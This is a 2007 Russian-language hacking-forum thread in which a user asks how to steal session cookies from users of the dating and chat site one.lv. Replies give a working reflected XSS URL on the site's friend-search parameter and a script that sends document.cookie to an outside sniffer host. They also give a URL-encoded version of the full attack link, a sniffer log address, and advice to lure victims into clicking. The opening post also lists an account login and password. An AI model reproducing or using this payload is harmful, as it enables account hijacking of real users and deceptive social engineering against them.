Встроить в сообщение сниффер на one.lv

Discussion in 'Песочница' started by offiks, 17 Mar 2007.

  1. offiks

    offiks New Member

    Joined:
    16 Jan 2007
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    Здраствуйте пользователи форума античат, прошу вас о помощи встроики сниффа в сообщение.

    Проблема:
    На сайте one.lv есть страница знакомства ну и там типо чат. На некоторых страницах открывается сессионид, с помощью него можно зайти на аккоунт жертвы.
    Я хочу узнать теги с помощю которых посылать сообщение (чтобы в сообщение прошла картинка), и тем самым одолжить у жертвы сессионид :)
    Пробывал вставлять теги типа: <a href=""> <img src=""> и так бб коды, сайт шлёт их как текст и не выполняет тег.


    Вот скрипт окна каторый я смог взять т.к. на сайте некоторые данные не защещины и стоит ввести только дир файла и перед вами скрипт... Сам скрипт

    Язык я этот плохо знаю но я увидел там тексто замену... но эту функцию найти не смог.

    Логин: offone
    Пароль: kazdanga10

    Прошу пожалуйсто помоч, если конечно это возможно (я уверен что возможно)
    Скажите тег с помщью каторого я смогу отослать снифф картинку.

    Спасибо за внимание.
     
    1 person likes this.
  2. Kaban

    Kaban Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    248
    Likes Received:
    78
    Reputations:
    14
    http://forum.antichat.ru/thread20140.html
     
  3. offiks

    offiks New Member

    Joined:
    16 Jan 2007
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    Это отправляется как текст, если не трудно зайди пожалуйсто на сайт и посмотри(проверь) Наведи на человека с ником: Ви. И отправь ему сообщение, затем отправленные сообщения можно посмотреть слева в столбце.
     
  4. Horsekiller

    Horsekiller Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    61
    Likes Received:
    33
    Reputations:
    6
    XSS после входа под регарым юзером.
    Это выведет простой алерт. Нет ничего сложного немного доработать и увести кукисы.
    Только надо юзеру впарить нужную ссылку и попросить нажать )
     
    #4 Horsekiller, 18 Mar 2007
    Last edited by a moderator: 19 Mar 2007
  5. offiks

    offiks New Member

    Joined:
    16 Jan 2007
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    Неплохо :) спасибо, но мне бы отослать лучше сниффер... так незаметней. Допустим я отсылаю сообщение а с ним и сниффер каторый мне отдает сессионид, и некакого палева... а так я спрошу зайди на ссылку плзз плззз :)))

    Да еще я сегодня увидел то что <> он отфильтровывает и ставит вместо &lt;&gt; есть идеи? до самой функции реплаце я не добрался... Как же обойти фильтр...
     
    #5 offiks, 18 Mar 2007
    Last edited: 18 Mar 2007
  6. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    гыгы. ты терминологией не владеешь почти. тебе все дали уже.
    Все теги идут текстом, потому что специально для таких как ты на сайтах ставят фильтры, которые не дают спионерить чужие данные.
    Тебе дали пассивную XSS то есть теперь ты должен каким-либо образом заманить на нее нужного тебе пользователя.
    то есть:
    Code:
    <script>img = new Image(); img.src = "http://site.ru/sniffer/s.gif?"+document.cookie;</script>
    http://c5.one.lv/navigate.do?st.id=community.ownfriends.page&st.friends.fl.search=%22%3E%3Cscript%3Ealert%28"XSS"%29%3C%2Fscript%3E
    тесно связаны. первое нужно подставить во второе и заставить юзера пройти по полученной ссылке или еще каким-либо образом.
    Сниффер есть на античате. если хочешь, я могу помочь тебе с пассивкой, но следить за сесией и кукисами на сниффере тебе придется самому.
     
  7. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Code:
    http://c5.one.lv/navigate.do?st.id=community.ownfriends.page&st.friends.fl.search=%22%3E%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E
    вот такой линк можно подсунуть юзверю с возгласом "смари че я нашел" а потом ждать его кукисы здесь :
    http://old.antichat.ru/sniff/log.php

    если злоеб*чий джино заработает, я упрощу тебе задачу)

    PS: обрати внимание, что форум разрезал эту ссылку

    =====

    ЗЗЫ кстати. не прошибает
    ЗЗЗЫ ачатовский сниффер лагает?))
     
    #7 DRON-ANARCHY, 18 Mar 2007
    Last edited: 18 Mar 2007
    2 people like this.
  8. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    дайте паблик-сниффер живой =)
     
  9. offiks

    offiks New Member

    Joined:
    16 Jan 2007
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    http://old.antichat.ru/b.gif
    http://old.antichat.ru/sniff/log.php
     
  10. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    хрен его знает.... не уходят)